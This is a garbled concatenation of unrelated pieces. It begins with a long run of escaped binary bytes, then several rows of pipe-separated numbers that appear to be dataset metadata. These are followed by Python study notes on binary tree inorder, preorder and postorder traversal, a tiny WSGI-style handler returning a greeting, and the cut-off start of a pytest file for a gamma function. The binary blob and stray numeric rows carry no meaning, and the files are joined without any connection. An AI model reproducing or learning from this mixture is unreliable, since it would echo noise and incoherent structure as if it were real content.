\x98\x16\x19Q\xe7\xfe\xce\xb9\x1e\xe4\x0b\xd2\x1a`\x8f\x84\xa0N\xce\xe7\xa0\x14L3Z0\x96 \x10\xa8\xbe\x0c\x80v\t\x12\x18\x0e\xd3"\xdc\xad\x9c\xd0h\x00~\xd6o\xf5\x9c\x80PV7\\8\x1f\xdd\xcb\xbd\xb7\t\xaf\x15b\xb5\x17\xaf\xcf\xcd#H)\x87\xac\xb6\x8d\xf2j"\xd2E\x9d\x86\xc2-\xe5\xe8\xf3\x06W\xff&\x8d\xbd"\x1b\xedO\xc9\xbck\xe4h~\xa0\xe6\xa16Wa\x8c\xe2\xb4_?\x92a\xa1^-\xfa\xda\xb6\x89f\x8b\xa6i\x96\x8c\xf4\xbd\xd7K*\xaa\x92\x16\x95<\x1b\x1c\xd5y\t\xb3\x11M\xbf\x81\xa6\x1e\x98\xc5\xa6\x88\xca\x08\x0c.\xfd\xc1QX\xde\x89?\x01L\xe3\xab#\xc7\xce\xa49\x1d\x00\xb0\x11\xa5\xc3\x84\xf1\xff\t\xa8\xcd\xed}+*\xbb\xdb\xe5\xa7\xbc;\xbc8.\xa7\xcf\x82\xd7o\xc3\xb8\xa5\xc7\xaa\x89\xfb\x0b\xe4\xd0\xfc+Go?E\xfex\x1by\x86\x16*\t\xff]\xef 
\x04Z\xb1\xc8\x9e\x14\xe3B\x13\xf9)\'d\xf7\xf7sT\x13\xde1\x15<9\x0c\x17&GL\xf8,\x06<W\xb6\x9bd\xb6H\x89\xdf\t/\xb9\xfb\xa2u\x88\xd4\xc7\x9a\x0b\x13_\xdc\x8ex\xe1|\x8a{\xc4h\x93\t1\x1c\x94\xc4\xd0\x839p\xef6\x8d\xb4\x10\x08Ct\\y\x80\xc3M\xd8\xec\xc4v\xdcT\x1b.\xdf\xa8\x83\xeb\xd3:@g\x99\xcc\x178\x17Gc\xbb\xfe\x8f\xc0Xl\xc4*(\x93\xce\xe9\xd8\x94\xcc\xac(\x1b\xb0\xeaU\x13\xdc\x08\x08[~\xef\x8e+\x98k\x9c\xff\n\r\xb7-\x8e\xbf\x85\xf7\xa6\x13=k\x95\xde\xde.]T\x1c\xe1B+(m\t\xd8a\xd6@\xb0\x80\x08*\xc1|\xc2n\x1c\n\xe6\x08\x1ex\xc5\x96\xf3\xf3\xbe\x01\x02\x16\xa2\xd4\x9c0\x95\xfa;\x94\xec\xa96g;\xe7\x1ff\xee\n\xaf\xf2\xff\x9e(^\xe4o\xf3\xd7\x82z\x8e7J>?\xe1#[h\x1a\x8b_\\i\xc9F\xfeBU\xb1@`\x9a\x87\x95^\xba\x94\x86,\xffX1^\x1c\xd2\xd4\x8dm\x86!\xf1\xc7\x95\xdf\xb6\xc8S7]l\xa1\xcd}\xfa\r\xa7\x0f\x8fw\xeb\xc4\xd7\x92\xa8[w\x8e \x04h\xae\xeb\x01%\x17\xe6\x1c\x1b\x82\x84\x9e\xc1\xb0f\x8c\xce\xcb\x88v\xa6/\xb0\xe8/y\x89\xd0\xf9\x92O\x91\xdbV\'E{\xc4\x986\xd8}\x10\xcc\xf41\xa2r\xcd\x01ZQ=\x08-\x8ag>M\xa0\xc9\xf8\xe5\xb6%n?\x172Y\xf8\xe7\xf1u<\xb5\xc4\xf3<\xb2\xf2\x0b\xe5N\x9cgt,\xba\xd3\xcb\x96H\xc0\xf3s\xaey\xea\xe1]\x84\x9b:x|s\xad\xc3\x03\x85"\x8b\xb3iO\x1a\xf4\xadxZ\x88?\x92\x97\xbd\xc6\xf5l\xf89A8\xd0\xf1\x01;b=rt\xd8\x01\x82;-\xef<\x01\xe8\xf9*\xaa\xff\xa7\x02\x8a\x8a\xefxEav\x94\xa4\xa2h\xc4^W\xd9\x18,]\xa7\xed\xc1\xf4C\xe9\xad[\x9bE\x14"\x8eu\x83q\xa6\x1d-\xab61\xf98\xfd\xaa\xd2m\xed\xa3<\xd9\xffM\xcb\xfea5\xdfS\xc5<\xb6\x93M\xea\x12k\x8b\x1f\xe9\xf99\xc98cV\xf0B\x1d\x91?\xbd\x80}[\x04\xca\x03Y;%\xba\xaa:\xa1\xb0\x07K\'\xb3\x9a2\xe4`#\xd01\x86\x05\x85\xb9\xc5\xd6\x14\xe1\xaa\x15]\xc2\xdfu&\x8a\xcf*:\x95K*\xbb\xeb\x9b\xa4M\xb75=\xd2\x04\xd0\x1dM\xb2n\xa5B\xb9\xa4\x9b\xc5/1m\x92\xf8\xfdK\xf7\xa9\x06D(\x13\xfd\xa0\x1d/\xe7\x02k\x1b\xb2"\xf2I\'\xee\xf9\xbf\x93\xb3\x8c\xfe\xbe6\xe3\xd1\x11Y[\xc6\xef\xc4\xdaM>\xe8\x02\xf2\xafd\xfd\xb8sx\xd0 
\xedi\xa0\xc5\x0e.\x03v\xb3\xc7\xaa\x945U\xf0>\x90\xafM\xba\x1c{b\xd5\x80\xf1\xdb\xf8l:H\xf6dgf\xd9g\x9c\xc9V\x19b\xd4\x0c\xbfZ\xa9jB\xcc\xab"\xb4\x026\x93Ax%GW\xc61\x9a<\xd0\x83qrk8 f\'Z\xed\xe5\x95\xce\xa3`\xb1\xe7\x1a\xf0\xd5\n8\x87\xea\x88\xcdN>\x0f\x9e5\xbbu\xd4\xa7\xd7\x8d;\xfe\xad\x85\x13v.\x01\xbe~\x13\x94\xdf\xf3\xa9W#\xdfW\xa6\xad\xc43\xf8\x8d&\xc7Z\x0e\xaf7\xb4\\\xf1\xa9\xe81\xcc?\xa5\xdb\xcf\xfc\n\t\xb9\xca\xddA\x06#\xf7t\x900\xde1}o\xc1\xbb\xd0\x1e\xe5J+\xab`\xed\x8d\x1f\x1c]ts&\'\xc8\x9b\x92_\x93e\x1cZ\r\x95\thV\x9f\x8a\x19\xc3\x10=\x00\xd5*-|s\xa4;\r\x81\xbb\x87\x1d\x92\xf58\xd5\xd5\x1a\xb8)\xc9\x02\x91\\A\x12\xacn\xae\x8f\xbe\x9c\xfb~\x96n0JZ8=\x19\x84)\xbb\xbd\x13\xe9\xb6\x13P\xe7c\xa5\x80 \x17\x8f\x07\xb8D\xc7\x8dM\x06\xad\x8f|c\x8e"\x8dZ\'\x06\xb9\xc2\x1a\xaa[`\xd7\xdc\xa7\x16:\xe4\xda\xb1\xbd\xa7\x94C\x1e\xb44\xd1H\\\xa3\xd1\xea\x92\xeat0\xd1\x02\x89\x05\xf2T&\xb92O\xebb\xdf;\x9c\xa0\x84\xe5\x9d;\xd8\xab\xab\xa2\x99\x81\xc7\xdc\xf1e\x8co\\I\xd9\x91\xa5\x07\xfb\xfc\xff\xa1\xa9P\xcf\xa7\xfe\x85S\x98\xff.o\x16\xee\x01\ts\x94T\xd87\xe4_p\x89\x0e%\x00\xf82E\x82\x93\x01\x85\x91-\x04\x10\x0c\x1e\x1c\xf9\xe3tJ\x7f\x045\xac\xdb\x96\xafs\x82\x11~\xe0U\x00\x80\xeb\x0c!"\xa0_\xe32$\x9e\x04\xdb\xf4W\xfb\xa8\xde\x05\xeb\xbb\x85!\x08\xc2\x10x\xc0\x07J\xc9b\xa8\x99\x10r\xfa`\x8a\x8d\x08\xb2\x906+\x88\xba\x03\x83\\\xa6\x9c&\xae6\xeasF\xbd5\xec\xe7\xcc\xe5\xb9h\xf3\xe7\xdb\xec\x1a2/\xd0\xc2J\xb9G\xfc\xc6i\x91}\x1a\xee\x9aT\xfe\x81i\xadP.\x10s\xbf"Y\r\xb4\xb6\xa5Q\xc8\xf0\xa0\xa4\xad\x0f\xaf\x88\xe8\x82`w\x83\r\x910\x9c\x88\x1f\x03\xe98fP\xf7\xf1\xa6\xea\xb7\xbd;I\xe7\xbe\x83a\xfc\xbfU\x1d\xd0\xf2\x1azl\x9b&\x87O\xa8\xec\xce\xa4\xed\xd1R\x84oY,_\x14\x0e\x86\x9a\xc2g\xd1m\xb6c\xc4\xc2\x83\x142\x8b\xc4>4\x06~\xcbl\xa1\xa6z\xfe\xb2\xb8\r\xfevr\x951\xc2\xb8\x1eF\x93\x87\x98\xfb#c\xbd\xfd\x07($Hc\x9ebw\xd6(\xbb\x91\xb5\x82f\xfbX\x8c\x99q\x9e/\xc9\x0b\x89C}\xd3,`D\x9b\x0f\xf6x\x8c\xfc\xd7[u]\x9c\x0e(L\x95<\xc1\xfcX_UJ\xb6\x8d5\x1a\xecjS)\xba&\xff\xe6hg\xf9\xdc6\xecF\xff\
xc4R\xbb\xdc|\x17\xc8\x13^<\t!\xe1\xc6\xdb\xd1\t\x96c>\x17r\x0c\\\x9d|\r\x9c\xf2H\xbf\xd2f\x96|?\x11F\x01\xa3\x96:\xf8{\x88<\xff:\xfc\x1f\x95\xc6`g\xff\xa0\r\x89\x1aO\x95g\xb1\x1e\xfeG}\xc7\x0fan\x91\xcc\xb0\x14\xe8\x87\x9a\xbe\xcd\xd1CE\xa7\xf6\x84A\x04\xbd\xd1\xed[iEo\x82\x91D\x19\xbc)\xef+\x06\xfb\x0e|;y\x9c\xe7\xa7\x8c\x02\x85\x15\xea\x1e0\xbc\x147\xe5\x8d\xd5$\x8c\xb6\x94h8c\x80\xb0\xdf\x00v\xedD\xb5\xb7\xb5KH\x8d\xba\xc6\xcf\x7f\x0cKhC\x8c\\\xef\x1e*z\x999\xfd\xad\xa8\x84\x92\xb8\xbc\xce\xb4\xec\xcc\xd9\x9b\xe7v:f\xa3\xdb\r\xdbK\xb5\xdalq1\xa2+S\xec[\xedV\x1a\xb6\x15\x12\x14\x0c\xde?\x03DyLB\xd1\xbd1\xe8T\xae\x9b\x9epe\x02v\xf6V\x7f\r\x01\xc7\x8b,\x82&V\xeaV\xca\xd8\x89\x0eEc\xb3\xbd\xf3\x84\x85\xa1\xb0\xca\x0f\x82\xc9\xc7\x13\xa8[\xf5\xbde?\x88\xd0\xab\xbf\xc1\xd5\xd4\xd4L\xca\x06G\xc8\xaf\xb6\xf5#\xe8\x86\xe1\x05\xfb|]hILy\x03\xed\xfe\xf3\xbe\xe6\xcc \x0b1\xb7K\xcbV\xc6(\xf9?\xa7Xr3.\xedY\xbem\xa9\xc4Rzf\xa6\xa7;J\x0f=\xb9$\xb7~\x89\x10\r\x9b\xae5\xf3\x18\xbe\xe4\xaa\x00U#\x90b\')@\x8c\xad\x85\x17\xbb\xbf\x9f\xe2O\xe7m\xf1x8\xc3\xe2J\xb6\x8e\xeb\x83q\x8f\x1b\xd4\x87\xc1\xdf\x99\x17)e\x88F\x96\xa0\xafX}\xdbt\x04\xca)#\x07:x]\x82\xf0:\xb1\xaf\xa3\xf9@%\xde?XT\x99\x12]\xfdFC\xaf\xc8]V\xaf=\xe9\xac\x11P\xf4\x17E\xfd\xe8k!Z\xa0\xe0\xfaAWkx\x1c\x81/\xbf\xd3\x93\x9e\x05\xbb\xb2\x97\x8d\x90\xe6\xbf\xc7\x9a\x03\xd6\xfas\xe6\xb0im\xc12\x9a\x0c\x99\xda\xb8\xe5\xad5Z\x85\xfc\xefp<\x0f\xdc\x9f\xd3\x8f0\x97S\xd3\xa1\xcd\xe7\x15hxR\xceL\xc5\x84\xe7\\1\x95\xd8\xca~\r\x10\x85\x91n&\x16\xca*G3f\xafZ\xbc\xb9\xf51hy\x1c\xf0\xd4\x85\xc0\xa2\x93s\xdaAw\xd3\xc6 
P\xeb\x9c\x13\x1d\xaas\x03\xdd\xf7\x83\xd5\xaa\xc8@*\x83\xf7\xa8\x8e\x0e\xe5<+\x9a\x14\t\x85U\xf2\x83o\x04L\x11\xe1\xca\xdc\x04lT#C\xdb\xb1I\x89\xcd\xd9\n\x0b}\'\x9c\x07D9\xbc\x8cPt\xb8\xc2\xad\x14\x9a\x80\x01Ut\x89\xd6\xae\xfe\x8e+\xb5\x14\xa9d\x0e\xb4\xc0\xd3\xc2\x02\x90nv\xa7\t`\x04\x8b\xed\x1d\xf5\xd1V\xa2\x93\xf4\xccF\xcbL\xf8\x14\x0f\xd2I]\x9dh1?\x8b9\x9a\x93\x93\\.\xb9v\x84\xe4A,\xb4\x06Q\x12+k\x15\x10\xf5\xfap\xf4\x82\xd4\xf9\x9eq\x0bB*\xd2\x11\x05|\xddc\xf67\xf1H,#\xdao\xd2\xcb\x025\xef(R\xf86\xca(j\x90\t\xed\xa7\x94\xa5\xad\xa1B\x17\x10\x82u\xbbY/\xebc\x96\xa3\xd3&\xa0+\xdfC\x8e\x86E\xbb \x1a\xbcI\xfey\xd0\xe0\xe3\x860\xc1\xa9\x05Vk|za\x9dni\x15C\x81\x06F\x9f\xd9%\xd5\x00E\x01\xd8\x0b\x82\xd1\xc4\x1c\'\xe8\xaf\xda66\xf6G\xea\xa5\x0c\xadi\xf1\x80y\xba\x83p\xba\x14\x1d\xa0n$\x02\x01\xd7\xbex\xc7\xf4\xe1\xaf2Jk\x0f\x8dy\x15j\x1du\xe8\xe6U\xa2\xfcq=d\xb0X\xa1\xe4\xf7\x9b\x17\xae\x04\xfa\x8d!2\xe2J\xd6\x92<\xf4\xa0"+0\x86\xea\x1fa\xb9\x86.\xc5\x14^\x8a\x11s%\x12;\xd4\xfb%\xe6\xf2\xa9D\x15\x14~\xcdX9\xf0\xedl\x9d\xff\x86?\r\xd7\xd2y\xbf\x80\x96\xf2\xc2\xd6\xf2\xc3q\x89"\xfc\x17\x040e\x1b\xa9yw\xcfm\xe2+\r\x0b\xb7\xe4\x01\x13o\xf2\x81\x8c\xfahOLF\x93\xa3\x1a\xe1\x8b\xa3P\xca#\x96N%\xe1H?\xa0\xad[\x07\xaf\x00\x86\xa9F_\xcf\x98]\x85\x92\x06\x94\xb9\r\xb1\xb1\x1c\x86\x91A9\xe0N\xed\xbd\xc8\x98\xcdn\xbcy\x144@L\\+\xf7\x1c\x91\xbf\x98C\xdd[n\xd5\xa0y#\xf8b\xc9\xe4\x99 
]r\xef\xad\x17\x0b\x9a\xe4\xa0>Ew?\x90\xf5S\xea>0II\xbc\xda\xc8\x91\xe1\x94g\xbd\x98\x94*G\x8e\'2`\xa6%\x8d\x82\xb3ND\x97\x14\xe6\xc1\xa8;\xa4tW\xdf\xb0\xd8\xd8$\xafom\xeb/e+\xb4\xd3"\x80\x8b`bt\xd2LL6\x98$\xf4\xa6\x8b\xfd\xc5\tWV5\x16\xd3\x11\xde$\xb6;<F\xac\xbcg\xc7\xc2sN\x95\x86\x08l\x91Q\x10\x8ay\n\x12-\x14\x98\xbc\xe4\xa6;\xe1\xe4\xd8\xc1.\xb2\xdee^\\\x0f\t2V2\r\x8f\x96\xe7]g,P\r\x06t\x00KJ\x87\xbe\xf4^\xf38\x08($\xf8\x02\x82ms3\x9b\xe7\x1fh\rqT\x0e\xbbX\xa0\x97\xb5\xd1\xef\x85v\xbc\x0e\x83\xad\x15\x12<\x8d\xcc\x9c*\xe1d\x8d\t\xda\n^W\xae\x95\x8f\xf7>\xaa\xab\xe9\xe4\x17\xa1\xda\xd4\x0f{\xc6S0\xa9A\x82\xa7\x9c\x01\xe4K\xdew\x8c\xc7t\x826\x01\xae_(v%)\x86W\xd8s-\x8b\xdd\xb3\x11\xfe;\xa1\x87\xf9\xc6I2\x9fl\x8d\xc3\x14\xb0\xb7_\x11J\xbd\x06\xe3\xd6qx\xdbFLG\xd6(\r\x80\x07\xdd\x1a\x9c<\xa1\r\n\x0f|\xcf\xcb\xe0\x96o\\\x92\x02\xe7\xb7$\x84>\xda\x7f#\xfa\xc613y\xf3"\x8a\x15\x81\xb0`\xcb\xd3!9;\x0e\x1c\x97\xb9b\x89Ra\xfc\xcdT\x08\x97\x88\xc6\xf1X\xae\x0cbR\xaaZ\x8fa\x0fUu\xe6\xfc\x08\\\x0b\xe2Q\xb1\xb88]\xf4q\x9b\x13\x02\xc0\xca!\xbe\x00\xb0\xa4\\\xb2\xa2\xb5\xa6\xe2\xfam\x8f\x01\x01\xd4"\xd7\xc8\x1d\x16<\xf8u\xdfw\x80q\xc6\xf5\xd7\xb7L\x9f~\xaa\x97\x14u\xb44\xd83\xa9\xc0\x89\xf7\xe8\x82\xfb\xe6<\xedL\xcd\x9bt\x88\xbf\x9f\x07]\x87\x08\x95\xe6\xf7\xa4\x90\xe2\xdf\xa0D\x15\x07U 
\r\xbe\xf9\xdb\xfec~\x8b+\x10\x0b\xdc\xb79f\xa6H\xca\x93\xb8\x17Y\xae\xc9n\xf7\xa2\x82\xdc\xb1A\xa9Sr\xb0\x90\xe2sZB\x80\x9c\x89\xfb\xed\xb5\x91\x92\x84`\x13\x1av\x7f\x125\x98\x0ee\xb5\xd8h\xea\x04\xec\xcd\xcf"\xbd\xd2\x1fG\x87\x0f\x03\x16}\xdd\xd0\xc2\xd5\x88\x0b\xc3$\x1e\x05\x80\xb8\xa9L\xd5iT\xf3E\xdek\xac\x8e\xe3\xefTy\x8b\x14W\x01\x84\xe7\t8\x08\xa4\xe3\xce\x86\xd4\xbd\xac\'0\xa2P3\xf5/U\x81S\xa2\xe8\r\xccd\x01\x002\xfa\x9aD\xb3\xfa\x11\xa7\x11\xba7\x98\xcb\x10\x15\x9b=\xdb)\xc6\xb6\xf7`\xa3\x9c\xe0\xef9\x14\xfb\x8c]\xd6\xe5s\xd4\xb4\xc46\xc4\xf6)\xe2\xa3\xf9\x193\xe2\xcb\xd6\xa5F\xb9H\tq_\xb9\x98;\xd89\xfc\x18\xf0\xa8t\xe6\xcb\xbcP\xf3\x9e!\xfe\xc3\x96\xe0\x1e\x80\x84[\xb2\x19nvpg\x10\xc1\xa1\xbd\xcc>1\xa4\xe4\xca_\x96\x06(PE\x8c\xf1i\x05:\x13\x958y\xa2X\xc9\x97\x8fy U\xd5FF\x01\xbd\xd0N<\xc2\x15\x02\x93\xd0\xab\x00\r!p\xb3\xf5Z\nQ\x9d\x9f\x7f\x8c\x9f\xed\xdc\xc0\xb1\xd1\xb6t\x96\xdb\xa3\xabe\xa4T\xdc\xd5\xa4\xe21W\x10\xdc\xc7\xffo\x0c\xa2\xb5\x83\x01\x1f\xb0\xdet\x88n7\xd1\xeb\x12t\x06\x88\xa2L\x90\xcc\x8d\\5\xcd\xf3\xe5\x15\xcd\xd4\xe5Y\xde\xf5{\x8f|w\xee3\xa2\xd2\x8b\xf8\xf9\xdb\xd9\xb2\xddX\xd1%\x8c\xcdI\x00n\xc7lQ\x9a?\x86\xa3\xcczH \xb2\xa9\x7f\xa7\x92\xe0t3\x1d4\x02\xa9\x81\x10\xb9\xceON\xf4\xd3UQO\x8dT\xf0\xa0t\xe9w\x8a\xa5\xf8v\x10v|4\xd1Wb(\xf1l\xab\xbf\xea\xee\xbe\xa1\xa0\xc8KP\x07\xb9y_\xbe\xbe\x00\x885\xe0\xb0\xc4\x9cOQP\xec\xfcC\xddo\xa3\xa5\xdc\xddUwE\x98\xb2\x97\x146\x8dC|\xdc\x01\xeb\'\xb9mD\xdb\\\x07{\x17\xab\xb8T _r#|\xeb[99,pC\xaf\xb1\xb4\xd3\xe7Pc\xb1\xd1\x15\xc0K\x8f\xd4\x0f\xb8Qx\xf4\xc7\x98\xeeGU+\x81V\xc8\xc6\xe3\xb3,e\x0b}|\xd2\xf2V(\xb7\x05\xc1f\xf8\xc4uo%\x93\x08\xed\xa6.\xed\xca\xbeA\x1d\xb7\x16.\x0flLPi:_3x\xc4\xb1O\xc5\xc2\x91\xdd\xf3\xf9[K\xb6\xfa\xcaK\x08\xac\x96\x06\xfa\xf7\xf2i&2\xbc\n&\x01\xafa\xf3$\xe4\xbby\xbfs\xc7\x18\\\xd5\xe0c 
AT\xa8$\xd1\xcd]\x1f\xa6\x97\xfe\xbfm?\x96\xe7\x18d\xeaO\x1d\x03E\xdbH\xb6\x11\xfe\\\xd6\x00\x147\x8bd\xed8\xd7Z\xf7Hx\x088U\x9eo\xdc\xce\xc2\xd1\xd6W\xe2j\x06f\xc0#\x84\xc0H\xb43\xe3\xca8@A\x84\x83\x1d\x9e\xa7b\xa9\x89\xbf\xce\xd1\x8a\xeb%$\xcd\x11\x82\x0f\xbbl\xe4\xbd\xc2\xa3\xce\xbc\xf7\xa1\x1dk\xd6\xecY\xe7c\xbb47\neu\xe2y\xe5\xb4=\xe4\xe3\xc7\xccs\xf1\x10\xdb\x9f\xa5\xf8\xa5\xf9\x8a\xe2z}\x072"m[\xd0"\xc7\x83[G\x86\xe6~\x85\xf1Y\xffpNM96\xea\x8a\xeek\xc4\x15]\xa4\x8d\x9f\xf5h\x83h\xdb\x16`\xa9\xbb6[8\xd3\xe5v\xc5\x92dsL\xb08\xeb\xe8\x92V\x02\xf2\x95{\xc4\xb8\x16E7\xa0\xb6\xf7\xden\xdc\x08\x15 \xcf\x16^\xb0C<\xe2]\x9e\x8f\x10R\n!\xd3\x04\x05\xdf\xfd(kUG\xee\xb3\xfb\x92c\xbc\x02\x9d\xb8\xe5\x1dq\x98\xa7|\x18\n\xf4%\xec\r\xb4T\xbc$\'<\x02\xb6#\xd4^\x1e\x0f\xa2\xe9\xfft+\x00\xdc\xa7\x9a\x1de\xf9\x0bt\xebf\x91\xdd\xe8\xba\x9a\xf6\xd6\x1e\xaa2\xd4\x92\xf60rz\xfc\xa2=b\x12\xb4\x12\x93\nO\xe5n\x11\x1bG"\xf5\x99\xfdw\xce\x19\x85\xc9|'
| 220,525
| 435,946
| 0.734436
| 101,349
| 441,050
| 3.190017
| 0.119311
| 0.000186
| 0.000056
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.232752
| 0.001349
| 441,050
| 2
| 435,946
| 220,525
| 0.501273
| 0
| 0
| 0
| 0
| 204
| 0.68697
| 0.685213
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e5b5e825b7eabce2fa67dac63053e620fbe29da8
| 3,113
|
py
|
Python
|
Notes/Sprint3/BinaryTree_BST.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | 1
|
2021-02-28T07:43:59.000Z
|
2021-02-28T07:43:59.000Z
|
Notes/Sprint3/BinaryTree_BST.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | null | null | null |
Notes/Sprint3/BinaryTree_BST.py
|
mark-morelos/CS_Notes
|
339c47ae5d7e678b7ac98d6d78857d016c611e38
|
[
"MIT"
] | 1
|
2021-03-03T03:52:21.000Z
|
2021-03-03T03:52:21.000Z
|
"""
Binary Tree Inorder Traversal
Given the root of a binary tree, return the inorder traversal of its nodes' values
Examples:
Input: root = [1, null, 2, 3]
Output: [1,3,2]
Plan
- Use recursion to go to the left subtree first
then process the current node,
then use recursion again to the right subtree next
When building a recursive function:
base case, recursive case
"""
class TreeNode:
    """A single node of a binary tree: a value plus optional child links."""

    def __init__(self, val=0, left=None, right=None):
        # Bind payload and both children in one tuple assignment.
        self.val, self.left, self.right = val, left, right
class Solution:
    """Inorder (left, node, right) traversal of a binary tree."""

    def inorderTraversal(self, root: "TreeNode"):
        """Return the inorder traversal of the tree's values.

        Returns an empty list for an empty tree (root is None).
        """
        res = []  # node values collected in visit order
        if root is not None:
            # BUG FIX: original called inorderTraversalHelper(root, res)
            # without `self.`, which raises NameError at runtime.
            self.inorderTraversalHelper(root, res)
        return res

    def inorderTraversalHelper(self, root, res):
        """Recursively append values of the subtree rooted at `root` to `res`."""
        if root is None:  # base case: empty subtree
            return
        if root.left is not None:
            self.inorderTraversalHelper(root.left, res)
        res.append(root.val)  # process current node between the subtrees
        if root.right is not None:
            self.inorderTraversalHelper(root.right, res)
# Demo: the example tree [1, null, 2, 3] built from real nodes.
# BUG FIX: the original passed a plain list and called the method unbound on
# the class (`Solution.inorderTraversal(root)`), which cannot work.
root = TreeNode(1, None, TreeNode(2, TreeNode(3)))
Solution().inorderTraversal(root)  # -> [1, 3, 2]
"""
Binary Tree Preorder Traversal
"""
class TreeNode:
    """Binary-tree node holding a value and optional left/right children."""

    def __init__(self, val=0, left=None, right=None):
        # Single tuple assignment keeps the constructor compact.
        self.val, self.left, self.right = val, left, right
class Solution:
    """Preorder (node, left, right) traversal of a binary tree.

    NOTE: the method names still say "inorder" — kept unchanged for
    interface compatibility, but the visit order implemented is preorder.
    """

    def inorderTraversal(self, root: "TreeNode"):
        """Return the preorder traversal of the tree's values."""
        res = []  # node values collected in visit order
        if root is not None:
            # BUG FIX: original called the helper without `self.` (NameError).
            self.inorderTraversalHelper(root, res)
        return res

    def inorderTraversalHelper(self, root, res):
        """Recursively append values of the subtree rooted at `root` to `res`."""
        if root is None:  # base case: empty subtree
            return
        res.append(root.val)  # process current node first (preorder)
        if root.left is not None:
            self.inorderTraversalHelper(root.left, res)
        if root.right is not None:
            self.inorderTraversalHelper(root.right, res)
"""
Binary Tree Postorder Traversal
"""
class TreeNode:
    """Node of a binary tree; children default to None (leaf)."""

    def __init__(self, val=0, left=None, right=None):
        # Assign value and child links together.
        self.val, self.left, self.right = val, left, right
class Solution:
    """Postorder (left, right, node) traversal of a binary tree.

    NOTE: the method names still say "inorder" — kept unchanged for
    interface compatibility, but the visit order implemented is postorder.
    """

    def inorderTraversal(self, root: "TreeNode"):
        """Return the postorder traversal of the tree's values."""
        res = []  # node values collected in visit order
        if root is not None:
            # BUG FIX: original called the helper without `self.` (NameError).
            self.inorderTraversalHelper(root, res)
        return res

    def inorderTraversalHelper(self, root, res):
        """Recursively append values of the subtree rooted at `root` to `res`."""
        if root is None:  # base case: empty subtree
            return
        if root.left is not None:
            self.inorderTraversalHelper(root.left, res)
        if root.right is not None:
            self.inorderTraversalHelper(root.right, res)
        res.append(root.val)  # process current node last (postorder)
| 26.606838
| 82
| 0.607774
| 370
| 3,113
| 5.081081
| 0.175676
| 0.038298
| 0.041489
| 0.108511
| 0.820745
| 0.809043
| 0.809043
| 0.809043
| 0.790957
| 0.754787
| 0
| 0.005558
| 0.306457
| 3,113
| 117
| 83
| 26.606838
| 0.865215
| 0.178927
| 0
| 0.966102
| 0
| 0
| 0.001931
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
e5bd23e93b748634d5ebd43a3a5d71737bcf1520
| 657
|
py
|
Python
|
MINI_WEB/mini_web/framework/mini_frame_3.py
|
GalphaXie/LaoX
|
b7e8f9744292dc052c870e4d873052e9bfec19ee
|
[
"MIT"
] | null | null | null |
MINI_WEB/mini_web/framework/mini_frame_3.py
|
GalphaXie/LaoX
|
b7e8f9744292dc052c870e4d873052e9bfec19ee
|
[
"MIT"
] | 12
|
2020-03-24T17:39:25.000Z
|
2022-03-12T00:01:24.000Z
|
MINI_WEB/mini_web/framework/mini_frame_3.py
|
GalphaXie/LaoX
|
b7e8f9744292dc052c870e4d873052e9bfec19ee
|
[
"MIT"
] | null | null | null |
#!/usr/bin/python3
# file: mini_frame.py
# Created by Guang at 19-7-19
# description:
# *-* coding:utf8 *-*
# def application(environ, start_response):
# start_response('200 OK', [('Content-Type', 'text/html')])
# return 'Hello World!'
# def application(environ, start_response):
# start_response('200 OK', [('Content-Type', 'text/html')])
# # return 'Hello World!'
# # 编码问题
# return 'Hello World! 中国...'
def application(environ, start_response):
    """Minimal WSGI-style handler: send 200 OK and return a greeting.

    BUG FIX: the original header list contained two Content-Type entries
    ('text/html' and 'text/html;charset=utf-8'); only the charset-qualified
    one is kept so the non-ASCII text renders correctly.

    NOTE(review): PEP 3333 WSGI expects an iterable of bytes; this
    mini-framework apparently consumes the returned str directly — confirm.
    """
    start_response('200 OK', [('Content-Type', 'text/html;charset=utf-8')])
    return 'Hello World! 中国...'
| 26.28
| 106
| 0.627093
| 82
| 657
| 4.939024
| 0.426829
| 0.192593
| 0.197531
| 0.187654
| 0.753086
| 0.753086
| 0.753086
| 0.753086
| 0.604938
| 0.604938
| 0
| 0.03154
| 0.179604
| 657
| 25
| 107
| 26.28
| 0.719852
| 0.652968
| 0
| 0
| 0
| 0
| 0.382075
| 0.108491
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0
| 0.666667
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
|
0
| 8
|
e5c5ac562b467fae04a78b379d29e12fdfd79e30
| 4,111
|
py
|
Python
|
tests/test_special_functions.py
|
James-Montgomery/platea
|
96188d34293d46ddc3f9935fe1349f83f72c13a8
|
[
"MIT"
] | null | null | null |
tests/test_special_functions.py
|
James-Montgomery/platea
|
96188d34293d46ddc3f9935fe1349f83f72c13a8
|
[
"MIT"
] | null | null | null |
tests/test_special_functions.py
|
James-Montgomery/platea
|
96188d34293d46ddc3f9935fe1349f83f72c13a8
|
[
"MIT"
] | null | null | null |
import pytest
import numpy as np
from scipy import special
import numpy.testing as npt
from platea import special_functions as sf
################################################################################
# Gamma Function
def test_gamma():
    """Check sf.gamma against scipy.special.gamma for scalar, 1-D and 2-D input."""
    xs = [0.0, 0.53, 1.0, 5.67, 10.0]
